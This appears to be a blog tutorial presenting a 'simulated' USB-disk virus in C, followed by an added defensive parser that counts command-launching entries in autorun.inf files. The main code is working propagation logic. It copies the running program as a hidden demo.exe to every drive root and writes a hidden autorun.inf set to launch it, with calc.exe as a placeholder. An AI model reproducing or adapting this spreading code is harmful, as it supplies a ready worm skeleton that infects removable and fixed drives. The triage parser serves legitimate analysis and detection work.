
The simplest simulated U disk virus (Autorun.inf)

黄舟 (original)
2017-01-22 14:18:22

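autorun.inf is a system file commonly encountered in everyday computer use. Its purpose is to allow a specified file to run automatically when the disk is double-clicked.
Here are a few API functions.
1. DWORD GetLogicalDriveStrings(
       DWORD nBufferLength, // size of buffer
       LPTSTR lpBuffer      // drive strings buffer
   );
2. char *strncpy(char *dest, const char *src, size_t n);
   First parameter: char *strDest, pointer to the destination string. Second parameter: const char *strSource, pointer to the source string. Third parameter: size_t count, the number of characters to copy. Return value: pointer to the destination string.
Below is the C/C++ code.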

#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <string.h>

// Contents written to autorun.inf in each drive root; every command entry starts calc.exe.
const char *gstrAutoRun =
    "[autorun]"
    "\r\nopen=calc.exe"
    "\r\nshell\\open\\Command=calc.exe"
    "\r\nshell\\explore=资源管理器(&X)"
    "\r\nshell\\explore\\Command=calc.exe"
    "\r\nshellexecute=calc.exe"
    "\r\nshell\\Auto\\Command=calc.exe";

void Infect(char *pstrFilePath)
{
    // Buffer receives the drive roots as consecutive strings: "C:\\\0D:\\\0...\0"
    char strDriveStrings[MAXBYTE] = { 0 };
    DWORD dwDriveStrLen = GetLogicalDriveStringsA(MAXBYTE, strDriveStrings);
    DWORD dwError = 0;

    // Each entry ("X:\\" plus terminator) is 4 bytes long
    for (size_t i = 0; i < dwDriveStrLen; i += 4)
    {
        char strTargetPath[MAX_PATH] = { 0 }, strRoot[4] = { 0 };
        strncpy(strRoot, &strDriveStrings[i], 4);

        // Copy this executable to the drive root as a hidden demo.exe
        strcpy(strTargetPath, strRoot);
        strcat(strTargetPath, "demo.exe");
        if (!CopyFileA(pstrFilePath, strTargetPath, FALSE))
        {
            dwError = GetLastError();
        }
        SetFileAttributesA(strTargetPath, FILE_ATTRIBUTE_HIDDEN);

        // Write a hidden autorun.inf to the same drive root
        strcpy(strTargetPath, strRoot);
        strcat(strTargetPath, "autorun.inf");
        HANDLE hFile = CreateFileA(strTargetPath, GENERIC_WRITE, 0, nullptr,
                                   CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, nullptr);
        DWORD dwLen = 0;
        WriteFile(hFile, gstrAutoRun, (DWORD)strlen(gstrAutoRun), &dwLen, nullptr);
        CloseHandle(hFile);
    }
}

int main()
{
    // Full path of the running executable
    char strSelfPath[MAX_PATH] = { 0 };
    GetModuleFileNameA(nullptr, strSelfPath, MAX_PATH);
    Infect(strSelfPath);
    return 0;
}
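
When triaging removable media, the entries of an autorun.inf that matter are the ones that launch a command. The following is an added example, not code from the original article: a portable C parser that counts the launch entries (open, shellexecute, shell\<verb>\command) in the [autorun] section. The function names and the sample text are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Trim and lowercase s[0..n) into out (truncating to cap-1 bytes). */
static void norm(const char *s, size_t n, char *out, size_t cap) {
    while (n && isspace((unsigned char)*s)) { s++; n--; }
    while (n && isspace((unsigned char)s[n - 1])) n--;
    if (n >= cap) n = cap - 1;
    for (size_t i = 0; i < n; i++) out[i] = (char)tolower((unsigned char)s[i]);
    out[n] = '\0';
}

/* Keys that run a command: open, shellexecute, shell\<verb>\command. */
static int is_launch_key(const char *k) {
    size_t n = strlen(k);
    if (!strcmp(k, "open") || !strcmp(k, "shellexecute")) return 1;
    return n > 14 && !strncmp(k, "shell\\", 6) && !strcmp(k + n - 8, "\\command");
}

/* Count (and print) launch entries inside the [autorun] section of INF text. */
int count_autorun_launchers(const char *inf) {
    int in_section = 0, hits = 0;
    while (*inf) {
        size_t len = strcspn(inf, "\r\n");
        char line[512], key[128];
        norm(inf, len, line, sizeof line);
        const char *eq = strchr(line, '=');
        if (line[0] == '[') {
            in_section = !strcmp(line, "[autorun]");   /* section names are case-insensitive */
        } else if (in_section && line[0] != ';' && eq) {
            norm(line, (size_t)(eq - line), key, sizeof key);
            if (is_launch_key(key)) { hits++; printf("launch entry: %s\n", line); }
        }
        inf += len + strspn(inf + len, "\r\n");        /* skip to the next line */
    }
    return hits;
}

/* Constructed sample with the same keys as the article's payload. */
static const char SAMPLE_INF[] =
    "[autorun]\r\nopen=calc.exe\r\nshell\\open\\Command=calc.exe\r\n"
    "shell\\explore=Explorer(&X)\r\nshell\\explore\\Command=calc.exe\r\n"
    "shellexecute=calc.exe\r\nshell\\Auto\\Command=calc.exe\r\n";

int main(void) {
    printf("%d launch entries\n", count_autorun_launchers(SAMPLE_INF));
    return 0;
}
```

The shell\explore line is only a menu label, so it is not counted; the five command entries are.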
